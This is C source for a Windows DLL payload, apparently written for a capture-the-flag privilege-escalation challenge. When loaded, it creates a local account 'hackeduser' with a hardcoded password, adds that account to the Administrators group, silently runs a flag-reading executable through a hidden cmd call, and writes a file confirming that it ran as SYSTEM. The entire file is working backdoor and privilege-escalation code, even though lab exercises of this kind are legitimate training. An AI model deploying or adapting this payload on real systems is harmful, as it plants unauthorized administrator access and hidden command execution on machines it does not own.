// main.c
#include <windows.h>
#include <lm.h>

#pragma comment(lib, "Netapi32.lib")

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved) {
    if (fdwReason == DLL_PROCESS_ATTACH) {

        // 1. Create user
        USER_INFO_1 ui;
        DWORD dwLevel = 1;
        DWORD dwError = 0;

        ui.usri1_name = L"hackeduser";
        ui.usri1_password = L"P@ssw0rd123!";
        ui.usri1_priv = USER_PRIV_USER;
        ui.usri1_home_dir = NULL;
        ui.usri1_comment = NULL;
        ui.usri1_flags = UF_SCRIPT;
        ui.usri1_script_path = NULL;

        NetUserAdd(NULL, dwLevel, (LPBYTE)&ui, &dwError);

        // 2. Add user to Administrators group
        LOCALGROUP_MEMBERS_INFO_3 account;
        account.lgrmi3_domainandname = L"hackeduser";
        NetLocalGroupAddMembers(NULL, L"Administrators", 3, (LPBYTE)&account, 1);

        // 3. Trigger flag2.exe with predefined GitHub username
        WinExec(
            "cmd /c echo rolandoquiroz | \"C:\\Users\\superAdministrator\\Desktop\\flag2.exe\" > C:\\Users\\Public\\flag.txt 2>&1",
            SW_HIDE
        );

        // Optional: Write confirmation
        HANDLE hFile = CreateFileW(
            L"C:\\Users\\Public\\test.txt",
            GENERIC_WRITE,
            0,
            NULL,
            CREATE_ALWAYS,
            FILE_ATTRIBUTE_NORMAL,
            NULL
        );

        if (hFile != INVALID_HANDLE_VALUE) {
            const char* data = "DLL executed as SYSTEM with predefined GitHub username.\r\n";
            DWORD written;
            WriteFile(hFile, data, (DWORD)strlen(data), &written, NULL);
            CloseHandle(hFile);
        }
    }
    return TRUE;
}
